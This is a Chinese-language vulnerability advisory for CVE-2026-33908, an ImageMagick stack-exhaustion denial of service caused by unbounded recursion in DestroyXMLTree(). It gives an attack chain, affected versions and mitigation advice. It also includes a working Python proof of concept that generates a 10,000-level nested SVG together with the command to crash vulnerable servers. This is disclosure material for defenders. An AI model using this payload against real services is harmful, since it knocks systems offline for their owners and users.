CVE-2026-33908 CVSS 7.5 高危

CVE-2026-33908 ImageMagick 栈耗尽拒绝服务漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33908

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ImageMagick

漏洞概述

ImageMagick是一款广泛使用的开源图像处理软件。在7.1.2-19和6.9.13-44版本之前，其处理XML文件时存在严重漏洞。漏洞成因是`DestroyXMLTree()`函数在释放内存时使用了无深度限制的递归调用。攻击者只需诱导系统处理特制的深度嵌套XML图像文件，即可耗尽栈空间，导致程序崩溃，造成拒绝服务。该漏洞利用无需认证和用户交互，危害性较高。

技术细节

该漏洞的核心在于ImageMagick解析和销毁XML树结构的逻辑缺陷。当程序处理包含特定XML数据的图像（如SVG）时，会调用`DestroyXMLTree()`函数来清理内存。该函数采用递归算法遍历树节点，但代码中未实施最大递归深度的安全检查。攻击者可以构造一个包含极深嵌套层级（例如数万层标签）的恶意XML文件。当ImageMagick尝试解析并随后销毁该结构时，递归调用会在栈上累积大量的栈帧。一旦栈空间被完全消耗，程序将触发栈溢出保护机制而崩溃，导致服务不可用。由于触发条件仅需网络访问且无权限要求，该漏洞极易被自动化脚本利用进行DoS攻击。

攻击链分析

STEP 1

步骤1：恶意文件构造

攻击者编写脚本生成包含极深嵌套结构的XML文件（如SVG格式），旨在触发递归深度限制缺失的漏洞。

STEP 2

步骤2：文件传输

攻击者通过网络将恶意文件发送给目标服务器，或诱导管理员/用户上传该文件到使用了ImageMagick的服务。

STEP 3

步骤3：解析与处理

目标服务器上的ImageMagick进程接收到文件并尝试解析其XML结构，构建内存中的XML树。

STEP 4

步骤4：内存销毁与崩溃

处理结束或出错时，`DestroyXMLTree()`函数被调用。由于递归深度过大，栈内存迅速耗尽，导致进程崩溃，服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os

# PoC for CVE-2026-33908: Stack Exhaustion via Deeply Nested XML
# This script generates a malicious SVG file with deeply nested tags.

def generate_poc_xml(filename, depth):
    """
    Generates an XML file with nested elements to trigger stack overflow.
    """
    # Start opening tags
    open_tags = []
    for i in range(depth):
        open_tags.append(f"<tag{i}>")
    
    # Start closing tags (reverse order)
    close_tags = []
    for i in range(depth - 1, -1, -1):
        close_tags.append(f"</tag{i}>")
    
    xml_content = f"""<svg version="1.1">
{''.join(open_tags)}
<payload>Stack Exhaustion</payload>
{''.join(close_tags)}
</svg>"""
    
    with open(filename, "w") as f:
        f.write(xml_content)
    print(f"[+] Generated {filename} with nesting depth of {depth}")

if __name__ == "__main__":
    # A depth of 10000 is typically sufficient to exhaust default stack limits
    poc_file = "cve_2026_33908_poc.svg"
    generate_poc_xml(poc_file, depth=10000)
    
    # Simulation of exploit execution
    print(f"[+] Usage: convert {poc_file} output.png")
    print("[+] Running this against a vulnerable ImageMagick version will cause a crash (Segmentation Fault).")

影响范围

ImageMagick < 7.1.2-19

ImageMagick < 6.9.13-44

防御指南

临时缓解措施

在无法立即升级的情况下，建议限制ImageMagick处理非受信任来源的文件，或在应用层面对输入文件的XML嵌套深度进行预校验和过滤。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表